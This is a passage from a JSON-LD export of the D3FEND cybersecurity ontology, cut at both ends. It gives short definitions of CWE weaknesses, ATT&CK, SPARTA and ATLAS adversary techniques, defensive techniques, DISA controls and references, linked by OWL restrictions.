        },
        {
          "@id": "_:N9497b9e23b064c2f897630814a6b06d0"
        }
      ],
      "skos:prefLabel": "Impact Technique"
    },
    {
      "@id": "_:N9497b9e23b064c2f897630814a6b06d0",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:enables"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:TA0105"
      }
    },
    {
      "@id": "d3f:CWE-30",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-30",
      "d3f:definition": "The product uses external input to construct a pathname that should be within a restricted directory, but it does not properly neutralize '\\dir\\..\\filename' (leading backslash dot dot) sequences that can resolve to a location that is outside of that directory.",
      "rdfs:label": "Path Traversal: '\\dir\\..\\filename'",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-23"
      }
    },
    {
      "@id": "d3f:T1012",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:accesses": {
        "@id": "d3f:SystemConfigurationDatabase"
      },
      "d3f:attack-id": "T1012",
      "d3f:definition": "Adversaries may interact with the Windows Registry to gather information about the system, configuration, and installed software.",
      "d3f:may-invoke": {
        "@id": "d3f:GetSystemConfigValue"
      },
      "rdfs:label": "Query Registry",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:DiscoveryTechnique"
        },
        {
          "@id": "_:N2e1289987e4c49fdbf33d5255bcc763f"
        },
        {
          "@id": "_:N0b0fd424bfb448d8822d5952a2d2a2e9"
        }
      ]
    },
    {
      "@id": "_:N2e1289987e4c49fdbf33d5255bcc763f",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:accesses"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:SystemConfigurationDatabase"
      }
    },
    {
      "@id": "_:N0b0fd424bfb448d8822d5952a2d2a2e9",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:may-invoke"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:GetSystemConfigValue"
      }
    },
    {
      "@id": "d3f:CWE-44",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-44",
      "d3f:definition": "The product accepts path input in the form of internal dot ('file.ordir') without appropriate validation, which can lead to ambiguous path resolution and allow an attacker to traverse the file system to unintended locations or access arbitrary files.",
      "rdfs:label": "Path Equivalence: 'file.name' (Internal Dot)",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-41"
      }
    },
    {
      "@id": "d3f:CWE-391",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-391",
      "d3f:definition": "[PLANNED FOR DEPRECATION. SEE MAINTENANCE NOTES AND CONSIDER CWE-252, CWE-248, OR CWE-1069.] Ignoring exceptions and other error conditions may allow an attacker to induce unexpected behavior unnoticed.",
      "rdfs:label": "Unchecked Error Condition",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-754"
      }
    },
    {
      "@id": "d3f:EncryptedTunnels",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual",
        "d3f:EncryptedTunnels"
      ],
      "d3f:d3fend-id": "D3-ET",
      "d3f:definition": "Encrypted encapsulation of routable network traffic.",
      "d3f:isolates": {
        "@id": "d3f:IntranetNetwork"
      },
      "d3f:kb-reference": {
        "@id": "d3f:Reference-SecurityArchitectureForTheInternetProtocol"
      },
      "rdfs:label": "Encrypted Tunnels",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:NetworkIsolation"
        },
        {
          "@id": "_:Nbc7a4efe6e8b491a855dedad1fae4f97"
        }
      ]
    },
    {
      "@id": "_:Nbc7a4efe6e8b491a855dedad1fae4f97",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:isolates"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:IntranetNetwork"
      }
    },
    {
      "@id": "d3f:T1055.001",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:adds": {
        "@id": "d3f:SharedLibraryFile"
      },
      "d3f:attack-id": "T1055.001",
      "d3f:definition": "Adversaries may inject dynamic-link libraries (DLLs) into processes in order to evade process-based defenses as well as possibly elevate privileges. DLL injection is a method of executing arbitrary code in the address space of a separate live process.",
      "d3f:invokes": {
        "@id": "d3f:SystemCall"
      },
      "d3f:loads": {
        "@id": "d3f:SharedLibraryFile"
      },
      "rdfs:label": "Dynamic-link Library Injection",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:T1055"
        },
        {
          "@id": "_:Ne3cea6bf394c447c9e4f79c30a144237"
        },
        {
          "@id": "_:N7274d7a6bea149498cbf5181b628b99b"
        },
        {
          "@id": "_:N966c05be8d2e46d6a576e8ff9f8094d8"
        }
      ]
    },
    {
      "@id": "_:Ne3cea6bf394c447c9e4f79c30a144237",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:adds"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:SharedLibraryFile"
      }
    },
    {
      "@id": "_:N7274d7a6bea149498cbf5181b628b99b",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:invokes"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:SystemCall"
      }
    },
    {
      "@id": "_:N966c05be8d2e46d6a576e8ff9f8094d8",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:loads"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:SharedLibraryFile"
      }
    },
    {
      "@id": "d3f:Reference-RFC2289-AOne-TimePasswordSystem",
      "@type": [
        "owl:NamedIndividual",
        "d3f:SpecificationReference"
      ],
      "d3f:has-link": {
        "@type": "xsd:anyURI",
        "@value": "https://tools.ietf.org/html/rfc2289"
      },
      "d3f:kb-organization": "Internet Engineering Task Force (IETF)",
      "d3f:kb-reference-of": {
        "@id": "d3f:One-timePassword"
      },
      "d3f:kb-reference-title": "A One-Time Password System",
      "rdfs:label": "Reference - RFC 2289 - A One-Time Password System"
    },
    {
      "@id": "d3f:OSAPITerminateProcess",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:invokes": {
        "@id": "d3f:TerminateProcess"
      },
      "rdfs:label": "OS API Terminate Process",
      "rdfs:seeAlso": "An OS API function that stops the execution of a process.",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:OSAPISystemFunction"
        },
        {
          "@id": "_:N0f8892c4211e48c9947c2896735361de"
        }
      ]
    },
    {
      "@id": "_:N0f8892c4211e48c9947c2896735361de",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:invokes"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:TerminateProcess"
      }
    },
    {
      "@id": "d3f:Directory",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:definition": "In computing, a directory is a file system cataloging structure which contains references to other computer files, and possibly other directories. On many computers, directories are known as folders, or drawers to provide some relevancy to a workbench or the traditional office file cabinet.",
      "d3f:may-contain": {
        "@id": "d3f:File"
      },
      "rdfs:isDefinedBy": {
        "@id": "dbr:Directory_(computing)"
      },
      "rdfs:label": "Directory",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:DigitalInformationBearer"
        },
        {
          "@id": "_:Nb00ffcf7ac1e42e896d3a836a4464d53"
        }
      ]
    },
    {
      "@id": "_:Nb00ffcf7ac1e42e896d3a836a4464d53",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:may-contain"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:File"
      }
    },
    {
      "@id": "d3f:ProcessEviction",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual",
        "d3f:ProcessEviction"
      ],
      "d3f:d3fend-id": "D3-PE",
      "d3f:definition": "Process eviction techniques terminate or remove running processes.",
      "d3f:enables": {
        "@id": "d3f:Evict"
      },
      "d3f:kb-reference": {
        "@id": "d3f:Reference-MalwareDetectionUsingLocalComputationalModels_CrowdstrikeInc"
      },
      "rdfs:label": "Process Eviction",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:DefensiveTechnique"
        },
        {
          "@id": "_:Nb3432cf7fda74997a05bf53208da42fe"
        }
      ]
    },
    {
      "@id": "_:Nb3432cf7fda74997a05bf53208da42fe",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:enables"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:Evict"
      }
    },
    {
      "@id": "d3f:CCI-002749_v2022-04-05",
      "@type": [
        "owl:NamedIndividual",
        "d3f:CCIControl"
      ],
      "d3f:contributor": {
        "@id": "d3f:DISA_FSO"
      },
      "d3f:definition": "The information system audits the use of the manual override capability.",
      "d3f:member-of": {
        "@id": "d3f:CCICatalog_v2022-04-05"
      },
      "d3f:narrower": {
        "@id": "d3f:DatabaseQueryStringAnalysis"
      },
      "d3f:published": {
        "@type": "xsd:dateTime",
        "@value": "2013-07-11T00:00:00"
      },
      "rdfs:label": "CCI-002749"
    },
    {
      "@id": "d3f:HarmonicMean",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:d3fend-id": "D3A-HM",
      "d3f:definition": "The reciprocal of the arithmetic mean of the reciprocals of the data values. This measure too is valid only for data that are measured absolutely on a strictly positive scale.",
      "d3f:kb-article": "## References\nWikipedia. (n.d.). Central tendency. [Link](https://en.wikipedia.org/wiki/Central_tendency)",
      "rdfs:label": "Harmonic Mean",
      "rdfs:subClassOf": {
        "@id": "d3f:CentralTendency"
      }
    },
    {
      "@id": "d3f:OutboundInternetNetworkTraffic",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:definition": "Outbound internet network traffic is network traffic on an outgoing connection initiated from a host within a network to a host outside the network.",
      "rdfs:label": "Outbound Internet Network Traffic",
      "rdfs:seeAlso": {
        "@id": "dbr:Internetworking"
      },
      "rdfs:subClassOf": [
        {
          "@id": "d3f:InternetNetworkTraffic"
        },
        {
          "@id": "d3f:OutboundNetworkTraffic"
        }
      ]
    },
    {
      "@id": "d3f:CCI-000186_v2022-04-05",
      "@type": [
        "owl:NamedIndividual",
        "d3f:CCIControl"
      ],
      "d3f:contributor": {
        "@id": "d3f:DISA_FSO"
      },
      "d3f:definition": "The information system, for PKI-based authentication, enforces authorized access to the corresponding private key.",
      "d3f:member-of": {
        "@id": "d3f:CCICatalog_v2022-04-05"
      },
      "d3f:narrower": {
        "@id": "d3f:CredentialHardening"
      },
      "d3f:published": {
        "@type": "xsd:dateTime",
        "@value": "2009-09-15T00:00:00"
      },
      "rdfs:label": "CCI-000186"
    },
    {
      "@id": "d3f:NetworkConnectionCloseEvent",
      "@type": "owl:Class",
      "d3f:definition": "An event where a network connection is closed.",
      "rdfs:label": "Network Connection Close Event",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:NetworkConnectionEvent"
        },
        {
          "@id": "_:Nffe08595eba24aa9a5ddc82d71870350"
        }
      ]
    },
    {
      "@id": "_:Nffe08595eba24aa9a5ddc82d71870350",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:preceded-by"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:NetworkConnectionOpenEvent"
      }
    },
    {
      "@id": "d3f:EX-0014.02",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:attack-id": "EX-0014.02",
      "d3f:definition": "Here the adversary forges messages on internal command/data paths (e.g., 1553, SpaceWire, CAN, custom). By emitting frames with valid identifiers, addresses, and timing, the attacker can make subscribers accept actuator setpoints, power switch toggles, mode changes, or housekeeping values that originated off-path. Because many consumers act on “latest value wins” or on message cadence, forged traffic can mask real publishers, starve critical topics, or force handlers to execute unintended branches. Gateways that translate between networks amplify impact: a spoofed message on one side can propagate to multiple domains as legitimate payload. Outcomes include misdelivered commands, silent configuration drift, and control loops chasing phantom stimuli, all while bus monitors show protocol-conformant traffic.",
      "d3f:produces": {
        "@id": "d3f:BusNetworkTraffic"
      },
      "d3f:spoofs": {
        "@id": "d3f:BusMessage"
      },
      "d3f:uses": {
        "@id": "d3f:BusNetworkNode"
      },
      "rdfs:label": "Bus Traffic Spoofing - SPARTA",
      "rdfs:seeAlso": {
        "@id": "https://sparta.aerospace.org/technique/EX-0014/02/"
      },
      "rdfs:subClassOf": [
        {
          "@id": "d3f:EX-0014"
        },
        {
          "@id": "_:N2b356625db22468589a8e0bc02fe5df8"
        },
        {
          "@id": "_:N037d614a66a24892a1f39dd1b58bea51"
        },
        {
          "@id": "_:Nc1d5e98ee0204346a5815b4c310b1851"
        }
      ],
      "skos:prefLabel": "Bus Traffic Spoofing"
    },
    {
      "@id": "_:N2b356625db22468589a8e0bc02fe5df8",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:produces"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:BusNetworkTraffic"
      }
    },
    {
      "@id": "_:N037d614a66a24892a1f39dd1b58bea51",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:spoofs"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:BusMessage"
      }
    },
    {
      "@id": "_:Nc1d5e98ee0204346a5815b4c310b1851",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:uses"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:BusNetworkNode"
      }
    },
    {
      "@id": "d3f:SPARTALateralMovementTechnique",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:enables": {
        "@id": "d3f:ST0007"
      },
      "rdfs:label": "Lateral Movement Technique - SPARTA",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:SPARTATechnique"
        },
        {
          "@id": "_:N5300fbdae7f1448eaa1a8ed4b071463d"
        }
      ],
      "skos:prefLabel": "Lateral Movement Technique"
    },
    {
      "@id": "_:N5300fbdae7f1448eaa1a8ed4b071463d",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:enables"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:ST0007"
      }
    },
    {
      "@id": "d3f:OutboundNetworkTraffic",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:definition": "Outbound traffic is network traffic originating from a host of interest (client), to another host (server).",
      "rdfs:label": "Outbound Network Traffic",
      "rdfs:subClassOf": {
        "@id": "d3f:NetworkTraffic"
      }
    },
    {
      "@id": "d3f:T1132",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:attack-id": "T1132",
      "d3f:definition": "Adversaries may encode data to make the content of command and control traffic more difficult to detect. Command and control (C2) information can be encoded using a standard data encoding system. Use of data encoding may adhere to existing protocol specifications and includes use of ASCII, Unicode, Base64, MIME, or other binary-to-text and character encoding systems.(Citation: Wikipedia Binary-to-text Encoding) (Citation: Wikipedia Character Encoding) Some data encoding systems may also result in data compression, such as gzip.",
      "d3f:produces": {
        "@id": "d3f:OutboundInternetNetworkTraffic"
      },
      "rdfs:label": "Data Encoding",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:CommandAndControlTechnique"
        },
        {
          "@id": "_:N640f743b6e0140d38bc2b599b39cb42f"
        }
      ]
    },
    {
      "@id": "_:N640f743b6e0140d38bc2b599b39cb42f",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:produces"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:OutboundInternetNetworkTraffic"
      }
    },
    {
      "@id": "d3f:OTControlVariable",
      "@type": "owl:Class",
      "d3f:definition": "A control variable is the measurement of the physical condition of the device that influences the Process Variables.",
      "rdfs:isDefinedBy": "https://isagca.org/hubfs/2023%20ISA%20Website%20Redesigns/ISAGCA/PDFs/Industrial%20Cybersecurity%20Knowledge%20FINAL.pdf?hsLang=en",
      "rdfs:label": "OT Control Variable",
      "rdfs:subClassOf": {
        "@id": "d3f:OTLogicVariable"
      },
      "skos:example": "If the Set Point of a temperature control system for a residential dwelling is 72 degrees, and the Process Variable is 82 degrees, the Control Variable for the air conditioner should be 'on.'"
    },
    {
      "@id": "d3f:CCI-000831_v2022-04-05",
      "@type": [
        "owl:NamedIndividual",
        "d3f:CCIControl"
      ],
      "d3f:broader": [
        {
          "@id": "d3f:CredentialEviction"
        },
        {
          "@id": "d3f:ProcessEviction"
        }
      ],
      "d3f:contributor": {
        "@id": "d3f:DISA_FSO"
      },
      "d3f:definition": "The organization implements a configurable capability to automatically disable the information system if organization-defined security violations are detected.",
      "d3f:member-of": {
        "@id": "d3f:CCICatalog_v2022-04-05"
      },
      "d3f:published": {
        "@type": "xsd:dateTime",
        "@value": "2009-09-18T00:00:00"
      },
      "rdfs:label": "CCI-000831"
    },
    {
      "@id": "d3f:Real-timeOperatingSystem",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:definition": "A real-time operating system (RTOS) is an operating system (OS) for real-time computing applications that processes data and events that have critically defined time constraints.",
      "d3f:synonym": "RTOS",
      "rdfs:isDefinedBy": {
        "@id": "https://dbpedia.org/resource/Real-time_operating_system"
      },
      "rdfs:label": "Real-time operating system",
      "rdfs:subClassOf": {
        "@id": "d3f:OperatingSystem"
      }
    },
    {
      "@id": "d3f:T1189",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:attack-id": "T1189",
      "d3f:definition": "Adversaries may gain access to a system through a user visiting a website over the normal course of browsing. With this technique, the user's web browser is typically targeted for exploitation, but adversaries may also use compromised websites for non-exploitation behavior such as acquiring [Application Access Token](https://attack.mitre.org/techniques/T1550/001).",
      "d3f:modifies": {
        "@id": "d3f:ProcessSegment"
      },
      "d3f:produces": [
        {
          "@id": "d3f:OutboundInternetNetworkTraffic"
        },
        {
          "@id": "d3f:URL"
        }
      ],
      "rdfs:label": "Drive-by Compromise",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:InitialAccessTechnique"
        },
        {
          "@id": "_:N3b750423495b4305a02b4befe988df1c"
        },
        {
          "@id": "_:Nfcf18e7e47df4f00be739f7cee2939d3"
        },
        {
          "@id": "_:N932ca9ef6e9649b69a6c61df166857d2"
        }
      ]
    },
    {
      "@id": "_:N3b750423495b4305a02b4befe988df1c",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:modifies"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:ProcessSegment"
      }
    },
    {
      "@id": "_:Nfcf18e7e47df4f00be739f7cee2939d3",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:produces"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:OutboundInternetNetworkTraffic"
      }
    },
    {
      "@id": "_:N932ca9ef6e9649b69a6c61df166857d2",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:produces"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:URL"
      }
    },
    {
      "@id": "d3f:Reference-ProtectingAgainstDistributedDenialOfServiceAttacks-CiscoTechnologyInc.",
      "@type": [
        "owl:NamedIndividual",
        "d3f:PatentReference"
      ],
      "d3f:has-link": {
        "@type": "xsd:anyURI",
        "@value": "https://patents.google.com/patent/US7171683B2"
      },
      "d3f:kb-abstract": "A method for authenticating packet communication traffic includes receiving a data packet sent over a network from a source address to a destination address and reading from the packet a value of a field that is indicative of a number of hops traversed by the packet since having been sent from the source address. The authenticity of the source address is assessed responsive to the value.",
      "d3f:kb-author": "Guy Pazi, Anat Bremler-Bar, Rami Rivlin, Dan Touitou",
      "d3f:kb-organization": "Cisco Technology Inc.",
      "d3f:kb-reference-of": {
        "@id": "d3f:InboundSessionVolumeAnalysis"
      },
      "d3f:kb-reference-title": "Protecting against distributed denial of service attacks",
      "rdfs:label": "Reference - Protecting against distributed denial of service attacks - Cisco Technology Inc."
    },
    {
      "@id": "d3f:CCI-001589_v2022-04-05",
      "@type": [
        "owl:NamedIndividual",
        "d3f:CCIControl"
      ],
      "d3f:contributor": {
        "@id": "d3f:DISA_FSO"
      },
      "d3f:definition": "The organization incorporates detection of unauthorized, security-relevant configuration changes into the organization’s incident response capability to ensure they are tracked.",
      "d3f:member-of": {
        "@id": "d3f:CCICatalog_v2022-04-05"
      },
      "d3f:narrower": {
        "@id": "d3f:OperatingSystemMonitoring"
      },
      "d3f:published": {
        "@type": "xsd:dateTime",
        "@value": "2010-05-12T00:00:00"
      },
      "rdfs:label": "CCI-001589"
    },
    {
      "@id": "d3f:User",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:definition": "A user is a person [or agent] who uses a computer or network service. Users generally use a system or a software product without the technical expertise required to fully understand it. Power users use advanced features of programs, though they are not necessarily capable of computer programming and system administration. A user often has a user account and is identified to the system by a username (or user name). Other terms for username include login name, screenname (or screen name), nickname (or nick) and handle, which is derived from the identical Citizen's Band radio term. Some software products provide services to other systems and have no direct end users.",
      "rdfs:isDefinedBy": {
        "@id": "dbr:User_(computing)"
      },
      "rdfs:label": "User",
      "rdfs:seeAlso": [
        {
          "@id": "d3f:UserAccount"
        },
        {
          "@id": "http://wordnet-rdf.princeton.edu/id/10761247-n"
        }
      ],
      "rdfs:subClassOf": [
        {
          "@id": "d3f:Agent"
        },
        {
          "@id": "_:N1d6fb463c9ec4f07b20cb1e1643f9049"
        },
        {
          "@id": "_:Na2b5c6b8e96b49bf8dc0f3526c980ad5"
        }
      ]
    },
    {
      "@id": "_:N1d6fb463c9ec4f07b20cb1e1643f9049",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:has-account"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:UserAccount"
      }
    },
    {
      "@id": "_:Na2b5c6b8e96b49bf8dc0f3526c980ad5",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:restricted-by"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:AccessControlList"
      }
    },
    {
      "@id": "d3f:CWE-462",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-462",
      "d3f:definition": "Duplicate keys in associative lists can lead to non-unique keys being mistaken for an error.",
      "rdfs:label": "Duplicate Key in Associative List (Alist)",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-694"
      }
    },
    {
      "@id": "d3f:T0814",
      "@type": "owl:Class",
      "d3f:attack-id": "T0814",
      "d3f:definition": "Adversaries may perform Denial-of-Service (DoS) attacks to disrupt expected device functionality. Examples of DoS attacks include overwhelming the target device with a high volume of requests in a short time period and sending the target device a request it does not know how to handle. Disrupting device state may temporarily render it unresponsive, possibly lasting until a reboot can occur. When placed in this state, devices may be unable to send and receive requests, and may not perform expected response functions in reaction to other events in the environment.",
      "rdfs:label": "Denial of Service - ATTACK ICS",
      "rdfs:subClassOf": {
        "@id": "d3f:ATTACKICSInhibitResponseFunctionTechnique"
      },
      "skos:prefLabel": "Denial of Service"
    },
    {
      "@id": "d3f:T1546.007",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:attack-id": "T1546.007",
      "d3f:definition": "Adversaries may establish persistence by executing malicious content triggered by Netsh Helper DLLs. Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system. It contains functionality to add helper DLLs for extending functionality of the utility.(Citation: TechNet Netsh) The paths to registered netsh.exe helper DLLs are entered into the Windows Registry at <code>HKLM\\SOFTWARE\\Microsoft\\Netsh</code>.",
      "d3f:modifies": {
        "@id": "d3f:SystemConfigurationDatabaseRecord"
      },
      "d3f:produces": {
        "@id": "d3f:Process"
      },
      "rdfs:label": "Netsh Helper DLL",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:T1546"
        },
        {
          "@id": "_:Naa3caf414b56460384568f1f90ed57eb"
        },
        {
          "@id": "_:N8e37bd888adb4450b5097a5716e4c6a9"
        }
      ]
    },
    {
      "@id": "_:Naa3caf414b56460384568f1f90ed57eb",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:modifies"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:SystemConfigurationDatabaseRecord"
      }
    },
    {
      "@id": "_:N8e37bd888adb4450b5097a5716e4c6a9",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:produces"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:Process"
      }
    },
    {
      "@id": "d3f:CWE-642",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-642",
      "d3f:definition": "The product stores security-critical state information about its users, or the product itself, in a location that is accessible to unauthorized actors.",
      "rdfs:label": "External Control of Critical State Data",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-668"
      }
    },
    {
      "@id": "d3f:AML.T0079",
      "@type": "owl:Class",
      "d3f:attack-id": "AML.T0079",
      "d3f:definition": "Adversaries may upload, install, or otherwise set up capabilities that can be used during targeting. To support their operations, an adversary may need to take capabilities they developed ([Develop Capabilities](/techniques/AML.T0017)) or obtained ([Obtain Capabilities](/techniques/AML.T0016)) and stage them on infrastructure under their control. These capabilities may be staged on infrastructure that was previously purchased/rented by the adversary ([Acquire Infrastructure](/techniques/AML.T0008)) or was otherwise compromised by them. Capabilities may also be staged on web services, such as GitHub, model registries, such as Hugging Face, or container registries.\n\nAdversaries may stage a variety of AI Artifacts including poisoned datasets ([Publish Poisoned Datasets](/techniques/AML.T0019)), malicious models ([Publish Poisoned Models](/techniques/AML.T0058)), and prompt injections. They may target names of legitimate companies or products, engage in typosquatting, or use hallucinated entities ([Discover LLM Hallucinations](/techniques/AML.T0062)).",
      "rdfs:label": "Stage Capabilities - ATLAS",
      "rdfs:seeAlso": {
        "@id": "https://atlas.mitre.org/techniques/AML.T0079"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:ATLASResourceDevelopmentTechnique"
      },
      "skos:prefLabel": "Stage Capabilities"
    },
    {
      "@id": "d3f:CCI-001619_v2022-04-05",
      "@type": [
        "owl:NamedIndividual",
        "d3f:CCIControl"
      ],
      "d3f:contributor": {
        "@id": "d3f:DISA_FSO"
      },
      "d3f:definition": "The information system enforces password complexity by the minimum number of special characters used.",
      "d3f:member-of": {
        "@id": "d3f:CCICatalog_v2022-04-05"
      },
      "d3f:narrower": {
        "@id": "d3f:StrongPasswordPolicy"
      },
      "d3f:published": {
        "@type": "xsd:dateTime",
        "@value": "2010-05-12T00:00:00"
      },
      "rdfs:label": "CCI-001619"
    },
    {
      "@id": "d3f:CWE-297",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-297",
      "d3f:definition": "The product communicates with a host that provides a certificate, but the product does not properly ensure that the certificate is actually associated with that host.",
      "rdfs:label": "Improper Validation of Certificate with Host Mismatch",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:CWE-295"
        },
        {
          "@id": "d3f:CWE-923"
        }
      ]
    },
    {
      "@id": "d3f:Reference-SystemAndMethodForDetectingMalwareInjectedIntoMemoryOfAComputingDevice_EndgameInc",
      "@type": [
        "owl:NamedIndividual",
        "d3f:PatentReference"
      ],
      "d3f:has-link": {
        "@type": "xsd:anyURI",
        "@value": "https://patents.google.com/patent/US20190018958A1/en?oq=US20190018958-A1"
      },
      "d3f:kb-abstract": "In the embodiments described herein, a malicious code detection module identifies potentially malicious instructions in memory of a computing device. The malicious code detection module examines the call stack for each thread running within the operating system of the computing device. Within each call stack, the malicious code detection module identifies the originating module for each stack frame and determines whether the originating module is backed by an image on disk. If an originating module is not backed by an image on disk, the thread containing that originating module is flagged as potentially malicious, execution of the thread optionally is suspended, and an alert is generated for the user or administrator.",
      "d3f:kb-author": "Joseph W. Desimone",
      "d3f:kb-mitre-analysis": "",
      "d3f:kb-organization": "Endgame Inc",
      "d3f:kb-reference-of": {
        "@id": "d3f:ProcessCodeSegmentVerification"
      },
      "d3f:kb-reference-title": "System and method for detecting malware injected into memory of a computing device",
      "rdfs:label": "Reference - System and method for detecting malware injected into memory of a computing device - Endgame Inc"
    },
    {
      "@id": "d3f:EX-0015",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:attack-id": "EX-0015",
      "d3f:definition": "Adversaries extract secrets or steer execution by observing or perturbing physical byproducts of computation rather than the intended interfaces. Passive channels include timing, power draw, electromagnetic emissions, acoustic/optical leakage, and thermal patterns correlated with operations such as key use, counter updates, or parser activity. Active channels deliberately induce faults during runtime, e.g., voltage or clock glitches, electromagnetic/laser injection, or targeted radiation, to flip bits, skip checks, or bias intermediate values. On spacecraft, prime targets include crypto modules, SDR/FPGA pipelines, bootloaders, and bus controllers whose switching behavior or error handling reveals protocol state or key material. With sufficient samples, or with repeated fault attempts, statistical features emerge that reduce entropy of the sensitive variable under study; in effect, a successful fault campaign turns into information leakage comparable to a passive side channel. Collection vantage points range from on-orbit proximity (for EM/optical), to ATLO and ground test (for direct probing), to instrumented compromised hardware already in the signal path.",
      "d3f:modifies": {
        "@id": "d3f:OTEmbeddedComputer"
      },
      "rdfs:label": "Side-Channel Attack - SPARTA",
      "rdfs:seeAlso": {
        "@id": "https://sparta.aerospace.org/technique/EX-0015/"
      },
      "rdfs:subClassOf": [
        {
          "@id": "d3f:SPARTAExecutionTechnique"
        },
        {
          "@id": "_:N94916333e302411db945b098583967aa"
        }
      ],
      "skos:prefLabel": "Side-Channel Attack"
    },
    {
      "@id": "_:N94916333e302411db945b098583967aa",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:modifies"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:OTEmbeddedComputer"
      }
    },
    {
      "@id": "d3f:ResourceDevelopmentTechnique",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:definition": "The adversary is trying to establish resources they can use to support operations.",
      "d3f:enables": {
        "@id": "d3f:TA0042"
      },
      "rdfs:label": "Resource Development Technique",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:ATTACKEnterpriseTechnique"
        },
        {
          "@id": "d3f:OffensiveTechnique"
        },
        {
          "@id": "_:Nca4675329777460d9b50052714dd7024"
        }
      ]
    },
    {
